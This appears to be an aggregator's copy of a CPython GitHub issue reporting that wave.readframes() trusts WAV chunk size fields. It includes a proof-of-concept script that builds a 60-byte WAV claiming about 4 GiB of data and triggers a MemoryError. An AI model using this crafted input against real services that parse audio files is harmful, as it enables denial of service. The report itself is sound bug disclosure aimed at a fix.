python / python/cpython

Memory Exhaustion in `wave.readframes()` via Crafted Chunk Size

未關閉
#151,308 1 則留言 0 個 reaction 已指派 0 人 在 GitHub 檢視

還沒有人認領這個 Issue。

stdlib type-bug
主要語言
Python
星號
77.2k
分支
36k
PR 合併指標
PR 指標待擷取

描述

Bug report

Bug description:
Summary

The wave module reads RIFF/WAV chunk sizes from 4-byte header fields without validating them against available input. A 60-byte crafted WAV claiming ~4 GiB of audio data causes readframes() to attempt a ~4 GiB pre-allocation via file.read(chunksize).

Details

_Chunk.__init__ reads chunksize with no upper bound, then _Chunk.read() passes it to file.read():

https://github.com/python/cpython/blob/9633c5239daae3a180f8ce263ce77e4e522e6aa4/Lib/wave.py#L130

https://github.com/python/cpython/blob/9633c5239daae3a180f8ce263ce77e4e522e6aa4/Lib/wave.py#L188-L192

Reproducer
❯ docker run --rm -v "$(pwd)":/work -w /work python:3.14-slim python poc.py
MemoryError from 60-byte WAV with chunksize=4,294,967,295
"""
Memory exhaustion in wave.readframes() via crafted WAV chunk size.
"""

import resource
import struct
import sys
import tempfile
import wave


CLAIMED_SIZE = 0xFFFFFFFF  # ~4 GiB
MEM_LIMIT = 256 * 1024 * 1024  # 256 MiB


def build_crafted_wav() -> bytes:
    """Build a minimal WAV file (60 bytes) claiming ~4 GiB of audio data."""
    fmt_data = struct.pack(
        "<HHLLHH",
        1,      # wFormatTag = WAVE_FORMAT_PCM
        1,      # nchannels = 1 (mono)
        44100,  # framerate
        88200,  # dwAvgBytesPerSec
        2,      # wBlockAlign (nchannels * sampwidth)
        16,     # wBitsPerSample
    )
    fmt_chunk = b"fmt " + struct.pack("<L", len(fmt_data)) + fmt_data

    data_chunk = (
        b"data" + struct.pack("<L", CLAIMED_SIZE) + b"\x00" * 16
    )

    riff_header = b"RIFF" + struct.pack("<L", CLAIMED_SIZE) + b"WAVE"
    return riff_header + fmt_chunk + data_chunk


def main():
    wav_bytes = build_crafted_wav()

    with tempfile.NamedTemporaryFile(suffix=".wav") as tmp:
        tmp.write(wav_bytes)
        tmp.flush()

        try:
            w = wave.open(tmp.name, "r")
            w.readframes(-1)
            w.close()
        except MemoryError:
            print(
                f"MemoryError from {len(wav_bytes)}-byte WAV "
                f"with chunksize={CLAIMED_SIZE:,}"
            )
            sys.exit(0)
        except Exception:
            print("BLOCKED: wave rejected crafted chunksize")
            sys.exit(1)

    print("BLOCKED: no allocation error raised")
    sys.exit(1)


if __name__ == "__main__":
    resource.setrlimit(resource.RLIMIT_AS, (MEM_LIMIT, MEM_LIMIT))
    main()
Impact

Memory Error

Related issue

https://github.com/python/cpython/issues/141713

CPython versions tested on:

3.15

Operating systems tested on:

Linux

Linked PRs
  • gh-151487
  • gh-151488

貢獻指南

開啟貢獻指南

從這裡開始

  1. 先讀完整個 Issue,再讀專案的貢獻指南。
  2. 在 Issue 下留言說明你要接手 —— 這能避免兩個人做同樣的事。
  3. Fork 儲存庫,在一個分支上完成修改。
  4. 送出 Pull Request,並在描述裡引用這個 Issue 編號。

研究方向

從 Lib/wave.py 開始,特別檢視 _Chunk.init 和 _Chunk.read(),並使用 issue 中建立的 WAV 重現案例。在進行變更之前,先檢閱相關的 PR gh-151487 和 gh-151488。完成的標準是:該重現案例不再因所宣稱的 chunk 大小觸發 MemoryError,同時有效 WAV 的讀取仍然正常運作。

由索引模型根據 Issue 內容生成。

評估

技術堆疊
python
領域
security
Issue 類型
缺陷
難度
3/5
預估耗時
1-2 天
活躍度
停滯
描述清晰度
描述清楚
新手友好度
25/100

把新 issue 寄到你的電子郵件信箱

精選適合新手參與的 GitHub issue 摘要。